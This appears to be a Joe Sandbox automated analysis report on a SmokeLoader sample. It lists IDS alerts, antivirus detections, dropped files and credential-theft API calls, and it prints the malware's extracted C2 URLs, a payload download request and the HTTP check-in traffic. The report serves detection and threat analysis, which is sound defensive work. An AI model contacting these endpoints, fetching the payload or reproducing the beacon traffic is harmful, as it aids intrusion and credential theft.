2024-10-03T12:30:49.578093+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49793	23.145.40.162	443	TCP
2024-10-03T12:30:55.626266+0200	2039103	1	A Network Trojan was detected	192.168.2.4	49794	109.175.29.39	80	TCP

ETPRO MALWARE Dridex Post Checkin Activity 3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T12:28:42.784254+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49766	23.145.40.162	443	TCP
2024-10-03T12:28:44.091899+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49767	23.145.40.162	443	TCP
2024-10-03T12:28:44.969641+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49768	23.145.40.162	443	TCP
2024-10-03T12:28:46.042054+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49769	23.145.40.162	443	TCP
2024-10-03T12:28:47.014851+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49770	23.145.40.162	443	TCP
2024-10-03T12:28:48.074813+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49771	23.145.40.162	443	TCP
2024-10-03T12:28:48.955500+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49772	23.145.40.162	443	TCP
2024-10-03T12:28:50.644486+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49773	23.145.40.162	443	TCP
2024-10-03T12:28:51.566750+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49774	23.145.40.162	443	TCP
2024-10-03T12:28:52.468961+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49775	23.145.40.162	443	TCP
2024-10-03T12:28:53.374778+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49776	23.145.40.162	443	TCP
2024-10-03T12:28:54.252203+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49777	23.145.40.162	443	TCP
2024-10-03T12:28:55.156826+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49778	23.145.40.162	443	TCP
2024-10-03T12:28:56.094767+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49779	23.145.40.162	443	TCP
2024-10-03T12:28:57.278366+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49780	23.145.40.162	443	TCP
2024-10-03T12:28:58.240357+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49781	23.145.40.162	443	TCP
2024-10-03T12:28:59.309408+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49782	23.145.40.162	443	TCP
2024-10-03T12:30:15.179534+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49789	23.145.40.162	443	TCP
2024-10-03T12:30:32.301417+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49791	23.145.40.162	443	TCP
2024-10-03T12:30:49.938730+0200	2809882	1	Malware Command and Control Activity Detected	192.168.2.4	49793	23.145.40.162	443	TCP

ETPRO MALWARE SmokeLoader encrypted module (3)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T12:28:42.921889+0200	2829848	2	Potentially Bad Traffic	23.145.40.162	443	192.168.2.4	49766	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: veEGy9FijY.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\haevsid	Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\uievsid	Avira: detection malicious, Label: HEUR/AGEN.1311799
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Avira: detection malicious, Label: HEUR/AGEN.1311799

Found malware configuration

Source: 00000009.00000002.2753825516.0000000000630000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://calvinandhalls.com/search.php", "https://bestworldhools.com/search.php"]}

Multi AV Scanner detection for domain / URL

Source: calvinandhalls.com	Virustotal: Detection: 5%			Perma Link
Source: nwgrus.ru	Virustotal: Detection: 12%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\haevsid	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: veEGy9FijY.exe	ReversingLabs: Detection: 34%
Source: veEGy9FijY.exe	Virustotal: Detection: 37%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\haevsid	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uievsid	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\38E5.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: veEGy9FijY.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB43220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,	10_2_00007FF6AAB43220
Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB436F0 CryptExportKey,CryptExportKey,	10_2_00007FF6AAB436F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E03098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	13_2_00E03098
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E03717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	13_2_00E03717
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E03E04 RtlCompareMemory,CryptUnprotectData,	13_2_00E03E04
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E011E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	13_2_00E011E1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E01198 CryptBinaryToStringA,CryptBinaryToStringA,	13_2_00E01198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E0123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	13_2_00E0123B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E01FCE CryptUnprotectData,RtlMoveMemory,	13_2_00E01FCE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B4263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	15_2_00B4263E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B4245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,	15_2_00B4245E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 15_2_00B42404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	15_2_00B42404
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_00A325A4 CryptBinaryToStringA,CryptBinaryToStringA,	17_2_00A325A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 17_2_00A32799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,	17_2_00A32799

Source: veEGy9FijY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\veEGy9FijY.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\BC8F.exe	Code function: 10_2_00007FF6AAB4FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	10_2_00007FF6AAB4FB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	13_2_00E02B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	13_2_00E01D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_00E03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	13_2_00E03ED9
Source: C:\Windows\explorer.exe	Code function: 14_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,	14_2_001D30A8

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49788 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49792 -> 109.175.29.39:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49787 -> 58.151.148.90:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49772 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49776 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49774 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49767 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49778 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49771 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49769 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49766 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49777 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49781 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49770 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49775 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49779 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49789 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49782 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49768 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49793 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49793 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49773 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49791 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49791 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 23.145.40.162:443
Source: Network traffic	Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49780 -> 23.145.40.162:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://calvinandhalls.com/search.php
Source: Malware configuration extractor	URLs: https://bestworldhools.com/search.php

Source: Joe Sandbox View	IP Address: 109.175.29.39 109.175.29.39
Source: Joe Sandbox View	IP Address: 58.151.148.90 58.151.148.90

Source: Joe Sandbox View	ASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
Source: Joe Sandbox View	ASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US

Source: Joe Sandbox View	JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.4:49766

Source: global traffic	HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://xijgwgdevjmtswh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://fdgupvtosasiwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://kodkpkalobxsri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://jurmqqmqntcvqoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://hftfsugmiikbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wyhdnnvnqsrlhywg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://lapmbexmlxcjol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vblsrajdotdorwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: calvinandhalls.com
